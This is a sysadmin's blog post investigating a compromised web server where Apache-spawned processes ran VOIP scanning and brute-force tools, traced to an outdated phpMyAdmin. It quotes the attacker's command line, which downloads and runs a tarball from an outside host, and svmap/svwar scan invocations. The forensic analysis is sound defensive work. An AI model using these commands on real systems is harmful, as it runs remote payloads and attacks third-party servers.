Tracking root cause of Apache spawned processes: shell scripts / daemons

Want to help support this blog? Try out Oh Dear, the best all-in-one monitoring tool for your entire website, co-founded by me (the guy that wrote this blogpost). Start with a 10-day trial, no strings attached.

We offer uptime monitoring, SSL checks, broken links checking, performance & cronjob monitoring, branded status pages & so much more. Try us out today!

Profile image of Mattias Geniar

Mattias Geniar, December 01, 2010

Follow me on Twitter as @mattiasgeniar

This was a fairly fun experiment. Tracking down the source of a shell script which was spawned by Apache. This shell script would start scanning for VOIP servers, and if they were found launch a brute force attack upon them, by using a dictionairy of predefined “users”.

This is what it looked like from the command line.

[root@server~]# ps faux |grep -i python -B 3
apache    5909 0.0  0.0   1716   284 ?        S    21:00   0:00  \_ -bash
apache    5910 0.0  0.0   2448  1028 ?        S    21:00   0:00      \_ sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;rm -rf aloha.tar;wget http://www.dlaczego.org.pl/httpdocs/aloha.tar -q;tar -vxf aloha.tar;cd aloha;sh start;sh own
apache    5923  0.0  0.0   2448  1052 ?        S    21:00   0:00          \_ sh own
apache    5924  0.0  0.3  11244  7076 ?        S    21:00   0:02              \_ python svmap.py --randomize 193.*.*.*
--
root     13508  0.0  0.1   8348  2056 pts/0    S    21:54   0:00      \_ su -
root     13509  0.0  0.0   3748  1524 pts/0    S    21:54   0:00          \_ -bash
root     13687  0.0  0.0   2436   876 pts/0    R+   21:55   0:00              \_ ps faux
root     13688  0.0  0.0   3000   644 pts/0    D+   21:55   0:00              \_ grep -i python -B 3
apache   13683  3.6  0.2   9420  4940 ?        R    21:55   0:00 python svwar.py -v -e100-9999 193.11.222.209

This clearly shows that the user “apache” could start a custom shell script, which caused a download and executed a well-chosen binary. The “aloha.tar” file actually contained the SIPvicious tools, used to audit VOIP systems.

It would extract itself into /tmp (where else?), and start scanning. This launches a lot of svmap.py and svwar.py python scripts, which do the actual VOIP scanning.

The parent process is the interesting one.

[root@server~]# cat /proc/5905/environ
TERM=linuxOLDPWD=/var/www/vhosts/somedomain.net/httpdocs/phpMyAdminPATH=.PWD=/tmpLANG=CSHLVL=3_=./httpd
[root@server~]#

That parent proces has a very useful piece of information in “environ”. It tells us that the script was once using the folder “/var/www/vhosts/somedomain.net/httpdocs/phpMyAdmin”, which was the presumable cause of this hack. Its current working dir is set to /tmp, and it tried to start a process called ./httpd.

The httpd binary in /tmp started something like this.

[root@server~]# cat /proc/5910/cmdline
sh-cexport PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;rm -rf  aloha.tar;wget http://www.dlaczego.org.pl/httpdocs/aloha.tar -q;tar -vxf  aloha.tar;cd aloha;sh start;sh own
[root@server ~]#

An outdated phpMyAdmin, in combination with an FTP account with (chrooted) shell access. A very simple option to choose in Plesk controlpanels, and one with potentionally dangerous consequences, if a software bug or application vulnerability can be exploited.

Want to subscribe to the cron.weekly newsletter?

I write a weekly-ish newsletter on Linux, open source & webdevelopment called cron.weekly.

It features the latest news, guides & tutorials and new open source projects. You can sign up via email below.

No spam. Just some good, practical Linux & open source content.